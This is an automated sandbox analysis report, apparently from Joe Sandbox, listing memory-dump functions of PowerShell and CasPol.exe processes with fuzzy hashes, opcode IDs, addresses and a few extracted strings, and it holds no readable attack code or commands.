Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2852a449d99c9ab537aedbb1f96c41ec66f68aaa6a1da314aeced6d748005d67
Instruction ID: 876be7b9bc5eccaf822d4fd3750742bf7a1796777be2794677f231399a088514
Opcode Fuzzy Hash: 2852a449d99c9ab537aedbb1f96c41ec66f68aaa6a1da314aeced6d748005d67
Instruction Fuzzy Hash: 8151F974A10149AFDF05DF98C840A9EBBF2FF88314F28C559E804A7365C776AD92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072930A7 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28fa04e51a82b7cf240b8ec3093b0173eec2a37fc1adcb0f7ac9787632f1b286
Instruction ID: 3e28ec34d143802ef7d62215d0a1a1a2bd48608496594a651cc334d253a29f1f
Opcode Fuzzy Hash: 28fa04e51a82b7cf240b8ec3093b0173eec2a37fc1adcb0f7ac9787632f1b286
Instruction Fuzzy Hash: 1451D874A10109EFDF05CF98D884A9DBBF2FF88314F288559E805A7365C776AD92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07293A6F Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddea872fad3d25eabad56e3d217d88349b9a3c7fe2b7c36eedaabea4139d4fbb
Instruction ID: 6cc62576c2c1dc923dd368cd6e57b9577695d70be2f98963c8d8178f3f091617
Opcode Fuzzy Hash: ddea872fad3d25eabad56e3d217d88349b9a3c7fe2b7c36eedaabea4139d4fbb
Instruction Fuzzy Hash: 2D51F774A10209AFDF05CF98D894A9DBBF2FF48314F288459E805A7765C736AD92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07293D51 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 786f141693494e1a9b8551075b8b5fb3c525dc37e31924791873298453f3a15c
Instruction ID: 753f098b815199dcf070a9dc5d84cba82e1750d58277736cd4b487f8b10151c9
Opcode Fuzzy Hash: 786f141693494e1a9b8551075b8b5fb3c525dc37e31924791873298453f3a15c
Instruction Fuzzy Hash: B1513E74A0064A9FCB15CF9CC4909AEFBB6FF88314F248528D955A7395D332EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072936D9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84719c77f8fdf8ad71e46647c1ffcbd7ca55a114fe92502e551c1d99e581a9f8
Instruction ID: db6697913c75b054e8d11b11b7ae72ae637dbb7c6c319208afaded6639910098
Opcode Fuzzy Hash: 84719c77f8fdf8ad71e46647c1ffcbd7ca55a114fe92502e551c1d99e581a9f8
Instruction Fuzzy Hash: 26411FB4A115098FCB15CF9CD4849AEFBB2FF49310B288268E515E73A5D335EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D9937 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0438c78bd7ef8a1937f55f3521844c0589d509e4a317176da7eab754fb20e36
Instruction ID: 67c49eda04eec71aec0a48787ac1bb41ba6deb1b8fd3eff7e05fdf4704f11f56
Opcode Fuzzy Hash: b0438c78bd7ef8a1937f55f3521844c0589d509e4a317176da7eab754fb20e36
Instruction Fuzzy Hash: 6B51A935A102499FDB05CF98D484A9DFBF2BF48314F28C559E805AB365C776AD82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07292D10 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eb956163412eca63e6487e5333fe88aad730f1192e2cd70c2d583842353bc3
Instruction ID: 16feaf2b77224f55d5ae65bfc3f593e76aa662f946d4f9bf2dc596597614c422
Opcode Fuzzy Hash: a9eb956163412eca63e6487e5333fe88aad730f1192e2cd70c2d583842353bc3
Instruction Fuzzy Hash: 4E411975A0050A9FCB15CF9CC4849AEBBF6FF48314B248268E915A73A5C332EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07292312 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec039ced4715b7db92fc6fc51e154d029eafc3b7adade1217aee7f1784b3f561
Instruction ID: 01f4b7208f6b20f1cb473fb59b072ad0bfc1aefa806d51aa5db8e77764961c48
Opcode Fuzzy Hash: ec039ced4715b7db92fc6fc51e154d029eafc3b7adade1217aee7f1784b3f561
Instruction Fuzzy Hash: 7C411A75A10519DFCB15CF9CC4808ADBBF6FF88314B288669E915B7355C332AC51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 032D90D9 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d6a7bb9b4a8ee271f183eddbc64e08559eeeb2bdef47ebef2d9338fc61e1bf
Instruction ID: 9b03866ab12f16c5b5f17a4e7a4a599e4bcebe911859a67b594e89105f31ac52
Opcode Fuzzy Hash: c8d6a7bb9b4a8ee271f183eddbc64e08559eeeb2bdef47ebef2d9338fc61e1bf
Instruction Fuzzy Hash: 1641D634A102099FDB05CFA8D484A9DFBF2FF88314F28C559E404AB365C776AD82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D2710 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd629221e2c17708a4b8b49498b6314650367dbb5d70b421f31e0ae7256c366d
Instruction ID: 43b6c89774a02d3fbf741f45beb804deac7ad165977fba4f21a4a8ef98fd844c
Opcode Fuzzy Hash: dd629221e2c17708a4b8b49498b6314650367dbb5d70b421f31e0ae7256c366d
Instruction Fuzzy Hash: 4C413778A0060ACFDB15CF49D594AAEFBB5FF48310F1586A9D805AB355C732EC90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078D5718 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78e9e35c15ba92b0649b85d858ec1f6e7a940ac564a719ca43704064b83208a
Instruction ID: 74c84fcb36dd44f2a4cccf0609950aeb88eb0cefbc758f2017cf74412433ee47
Opcode Fuzzy Hash: c78e9e35c15ba92b0649b85d858ec1f6e7a940ac564a719ca43704064b83208a
Instruction Fuzzy Hash: E231B574B40105BBD718DBA8C850F7FBBA39B94358F24C428E902AF795CE7A9C418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 032D9630 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5df28d4db5aaf963e335cd0642f68dcbcf2e82c71d51336d8841790593b5d4
Instruction ID: 19c2ec71dc22f55d54fd2fec38ac255eb26cb5808d771532ea1c1a3cb9bda78f
Opcode Fuzzy Hash: 5a5df28d4db5aaf963e335cd0642f68dcbcf2e82c71d51336d8841790593b5d4
Instruction Fuzzy Hash: 40314B75A006099FCB14CF9DC5809AEFBB6FF48310B248699E519AB755C732FC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D9620 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c814ab28856e07cc6bbed89f2621210816cd775f0f073792e30d156461b96c
Instruction ID: cee49ca9c5eb159d0614a7c2d17f247c333094ab7c9e9c02169d842728db8a18
Opcode Fuzzy Hash: e0c814ab28856e07cc6bbed89f2621210816cd775f0f073792e30d156461b96c
Instruction Fuzzy Hash: 0A314F75A006059FCB15CF5DC5809AEFBB2FF48310B258299E519AB755C332FC91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 032D7901 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c110f548cae69b305c8a135610958bd6d3737d02499be31a300bc121c25c49
Instruction ID: 02d15d30f44bb79ab64bd90965f3013c1eb178ea3661e4baf10d668876f9d558
Opcode Fuzzy Hash: c3c110f548cae69b305c8a135610958bd6d3737d02499be31a300bc121c25c49
Instruction Fuzzy Hash: 64318E76A042099FCB01CF5DC8809AAFBB1FF49310B158195D549EB362C735FC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07290958 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db96132bd00cdfb5248c14d6da707246c04943de8d70870b42090b36b878a6bb
Instruction ID: 0ddee6ba8afe502cb53d9e2fe6ee8ae7342620dc3bb9ed206a61b28843ead94b
Opcode Fuzzy Hash: db96132bd00cdfb5248c14d6da707246c04943de8d70870b42090b36b878a6bb
Instruction Fuzzy Hash: 67312AB5A0060A8FCB54CF4DC5809AEF7F6FF48310B248268D559A7355C732ED91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032D7928 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795789e32830c5a61026504e6bc16534e32cb0349b6278058f9c07b88547893e
Instruction ID: 8f50363e4b1725bf613b501e7e2cb0415913f5d6dfdc3966c252f3603c4c0fc2
Opcode Fuzzy Hash: 795789e32830c5a61026504e6bc16534e32cb0349b6278058f9c07b88547893e
Instruction Fuzzy Hash: 3A214C75A0421A9FCB04CF5DC8809AAFBF1FF89310B158196D949E7352C736EC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 032D8DF7 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf264110aee01aba1dcb2b4c1d199966b73f6fdcae5065f856f3fc482e8066d4
Instruction ID: 04a8704ed5e2d2599b320e4d34c3821984a036f0159357fbd8952778167af372
Opcode Fuzzy Hash: cf264110aee01aba1dcb2b4c1d199966b73f6fdcae5065f856f3fc482e8066d4
Instruction Fuzzy Hash: B321F575A101099FCB04CF5CC4849AAFBF5FF88310B2585A9E909AB711C735EC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 032D9658 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dae4be277ba78f9ee8b16252f7283a25b3fc17cd9067103a76460ed80da3665
Instruction ID: d853e83b6496eb6e1064a0730c6d012b46f0b7900f7a1e6f5bd6f5d57592c337
Opcode Fuzzy Hash: 5dae4be277ba78f9ee8b16252f7283a25b3fc17cd9067103a76460ed80da3665
Instruction Fuzzy Hash: 0B216F75A005059FCB14CF5DC490AA9F7B2FF88320B258298D51AAB795C732FC82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 07291D08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f53c22aca4209877106c4c16a2939f863b4bdd32714ddaf8adf85af1fe3a1fa
Instruction ID: 546c0ff80230be0c5181966a88e32d20eae28b6cbf4880ab5cdcda6cc14fbd1c
Opcode Fuzzy Hash: 2f53c22aca4209877106c4c16a2939f863b4bdd32714ddaf8adf85af1fe3a1fa
Instruction Fuzzy Hash: AC1149B59002498FCB10CFAAC8447EEFFF5AF88324F248829D455A7240D775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07294268 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5997638153dbed9983af02d8bd8e186241761aa92ac346d409eccee82de5b3ca
Instruction ID: 966af0c518b837a14c769a37696290009c0beacf92a75ca64125a31450b152be
Opcode Fuzzy Hash: 5997638153dbed9983af02d8bd8e186241761aa92ac346d409eccee82de5b3ca
Instruction Fuzzy Hash: 9621D675920249EFDF05DF98D884EDEBBB2FF48314F28C559E404AB261C776A892CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07291D10 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a847cfb094d496231016035a8283dab9cc0edbdebed4f3064c5d1c89b30d742
Instruction ID: 617a5601b45fdbaa0af70e47d34cd868fb256ab8cb7c13940368f3fb7ea1fec2
Opcode Fuzzy Hash: 4a847cfb094d496231016035a8283dab9cc0edbdebed4f3064c5d1c89b30d742
Instruction Fuzzy Hash: 931128B59002098FCB10CFAAC8447EEFFF5AF88324F248829D515A7250CB75A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 07293BA0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4c4dd5a69a9795298b7b2affd6ef66ac6e8f59896307273761fd962709bb6e
Instruction ID: fb9e631e58244b06d760fb2f7d66456e5ec09e968640caf18de0e328c9553c92
Opcode Fuzzy Hash: bf4c4dd5a69a9795298b7b2affd6ef66ac6e8f59896307273761fd962709bb6e
Instruction Fuzzy Hash: E011B775910249EFDF05CF98D495A9DBBB2FF49324F28C459E404AB361C775A882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072931E8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1749969df5356f9321659382bdd5a14e069c8f81e9dd2dcae82c9e1e1b54b59
Instruction ID: 763a3c371bbf5281d72ea4da9080c602e7795466205696a68a08fe5076b19202
Opcode Fuzzy Hash: e1749969df5356f9321659382bdd5a14e069c8f81e9dd2dcae82c9e1e1b54b59
Instruction Fuzzy Hash: DA11C975A10249EFDF05CF98D885A9DBBB2FF48314F28C459E404AB361C776E982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07291748 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb780e583f78510e87975abf99fd54f80ad9bdde88ff0c73c0fa43c75c3723c
Instruction ID: 753ca6d7296e8e5d3f849e32b5eec79a168f64b1cccf8f6d408560d0e2c8c8b5
Opcode Fuzzy Hash: 0cb780e583f78510e87975abf99fd54f80ad9bdde88ff0c73c0fa43c75c3723c
Instruction Fuzzy Hash: 7A11C97491024AEFDF05CF98D484ADDBBB2AF48314F28C459E404AB361C775EC92CB50

Uniqueness

Uniqueness Score: -1.00%

Function 072908FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.446773103.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7290000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac85b6ef8edd90eca8f5f239136b1c0d6b07dd35ec97b864624568a6ce588730
Instruction ID: 239969e415c5927d0c3379e991abe53853682a67fcbe0382a5cd5d61f971e7b8
Opcode Fuzzy Hash: ac85b6ef8edd90eca8f5f239136b1c0d6b07dd35ec97b864624568a6ce588730
Instruction Fuzzy Hash: 9811C974A2024ADFDF15CF98D484A9DBBB2FF48314F288559E404AB361C775A882CB80

Uniqueness

Uniqueness Score: -1.00%

Function 032D9A44 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcdda90d59dc96eed76ecb138ea3bbbf2dd6da96ef6d2c590c5b1e96327913d7
Instruction ID: 5839076fd64c433ee38de95546ef903a9af11f0a3cf4b084ce8d11fffeff3e00
Opcode Fuzzy Hash: bcdda90d59dc96eed76ecb138ea3bbbf2dd6da96ef6d2c590c5b1e96327913d7
Instruction Fuzzy Hash: EC11B935A10249EFDB05CF98D484A9DBBF2BF48314F28D559F405AB361C775A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 032D91D4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38d28cdd0ec9cd18a0defda6621379106d54b231516aa1d36a7e0cc48910945
Instruction ID: 58c5ab9410e3b3f2fafe94c74f0c574e289c72e29f691d8aae0ae34348087223
Opcode Fuzzy Hash: f38d28cdd0ec9cd18a0defda6621379106d54b231516aa1d36a7e0cc48910945
Instruction Fuzzy Hash: 5E11B934A10249DFDB05CB98D485A9DBBF2BF48314F28C559E405AB361C775E982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 032D69C0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.438644224.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6db2d643b8f8dba6521bc8f114cb6795597ac34e86d7c052770c00f65a1b28
Instruction ID: 8d308d9e48247f97811fbf77385751aa34dcafcac70f649ee1934eb15b1cb221
Opcode Fuzzy Hash: 5a6db2d643b8f8dba6521bc8f114cb6795597ac34e86d7c052770c00f65a1b28
Instruction Fuzzy Hash: 85F0A974E1020A8FC780DF68D4859AEBBF1FF49314F505199D509DB321E731A981CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 078D87F0 Relevance: 7.7, Strings: 6, Instructions: 220COMMON

Download Yara Rule

Strings

tP6q, xrefs: 078D8900
XR;q, xrefs: 078D8985
$6q, xrefs: 078D886D
XR;q, xrefs: 078D8995
XR;q, xrefs: 078D8851
tP6q, xrefs: 078D88F4

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: XR;q$XR;q$XR;q$tP6q$tP6q$$6q
API String ID: 0-329443704
Opcode ID: d4f75b884132232ea650d98214435174544e447040f503768ebdd468adc0d82a
Instruction ID: a4e192781ac66b01c85fbc46d4358f48ce3d83edc7b69eb8c1adae13712d5950
Opcode Fuzzy Hash: d4f75b884132232ea650d98214435174544e447040f503768ebdd468adc0d82a
Instruction Fuzzy Hash: 0A711475B00205AFCB158F69C450AAABBE3AF95314F14C06AD855EF391CB32DC41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 078D057D Relevance: 6.3, Strings: 5, Instructions: 98COMMON

Download Yara Rule

Strings

4'6q, xrefs: 078D060F
$6q, xrefs: 078D05E5
$6q, xrefs: 078D05B7
$6q, xrefs: 078D05F1
4'6q, xrefs: 078D061B

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'6q$4'6q$$6q$$6q$$6q
API String ID: 0-2451984092
Opcode ID: c62414ce9f78a1726815c95bd648a9c8d87394c8d684b9490ca5f803fd9917f6
Instruction ID: 2475b9f90d8583895deaccf94f906e88577bb480a358138bc2c47b569fb48b36
Opcode Fuzzy Hash: c62414ce9f78a1726815c95bd648a9c8d87394c8d684b9490ca5f803fd9917f6
Instruction Fuzzy Hash: 023149F5B04306CFDB254EA5A010AA6BBB2EBE2219F24807BC845D7245DA36CC95C792

Uniqueness

Uniqueness Score: -1.00%

Function 078D87EB Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

XR;q, xrefs: 078D8985
$6q, xrefs: 078D886D
XR;q, xrefs: 078D8851
tP6q, xrefs: 078D88F4

Memory Dump Source

Source File: 00000003.00000002.447198858.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: XR;q$XR;q$tP6q$$6q
API String ID: 0-3745921904
Opcode ID: d4c3dcb0a16d70da7b0f381055867f8d7ef5083e920c88f8a1e7642f6b95c457
Instruction ID: 56bb76246ce51e81abc838ac765b77401b2f5d636fc3bead9e3be784a287c68c
Opcode Fuzzy Hash: d4c3dcb0a16d70da7b0f381055867f8d7ef5083e920c88f8a1e7642f6b95c457
Instruction Fuzzy Hash: 9041B4B4A00209EFDB24CF19C544AA9B7F3BF94758F19C059E455EB251C772EC81CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 4240, Parent PID: 6328COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	276
Total number of Limit Nodes:	32

Executed Functions

Function 006D6C68 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 006D7770

Memory Dump Source

Source File: 00000014.00000002.731501160.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6d0000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 619c3bbb8d9292b13db35391a3f694a4a6e5412222c5e514c4c8e9b6266ae170
Instruction ID: 487d9b99b800c4ee4d927e595ffdd18233972eaa7379479619e2c5e09698416c
Opcode Fuzzy Hash: 619c3bbb8d9292b13db35391a3f694a4a6e5412222c5e514c4c8e9b6266ae170
Instruction Fuzzy Hash: 752124B5C0465A9FCB10CF9AD484BEEFBB5BF48720F10856AD818A7340D778A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006D76F9 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 006D7770

Memory Dump Source

Source File: 00000014.00000002.731501160.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_6d0000_CasPol.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d8c326147d2f3d32cbb4e3d0ab80708ec2975d20f2b19c489bf90fa72a3a91b3
Instruction ID: ffd551ab03833be61c8dcbc93d4ee58cc429522b9f06c22beffb8631c7708d4d
Opcode Fuzzy Hash: d8c326147d2f3d32cbb4e3d0ab80708ec2975d20f2b19c489bf90fa72a3a91b3
Instruction Fuzzy Hash: D1214AB5C0065A9FCB10CFAAD444BEEFBB1BF48320F14856AD859A7341D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.730987379.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_30d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c07a18f8fecf8c805c812f7eba8868bf2e3f7901bce9740a6f7e1f62ffe596
Instruction ID: 5283177839ac59f8af8fbd93e21221d3c277a1df9a0b881781f121c2c7d194e9
Opcode Fuzzy Hash: 75c07a18f8fecf8c805c812f7eba8868bf2e3f7901bce9740a6f7e1f62ffe596
Instruction Fuzzy Hash: 62212575605240DFDB02CF58DDC0B26BFA5FB89328F248569EC054B296C336D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0060D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.731126361.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_60d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f5ee34258cdba8d434ba5f72ac424cf207ac477b7dc112f6b4b5b6b838faf12
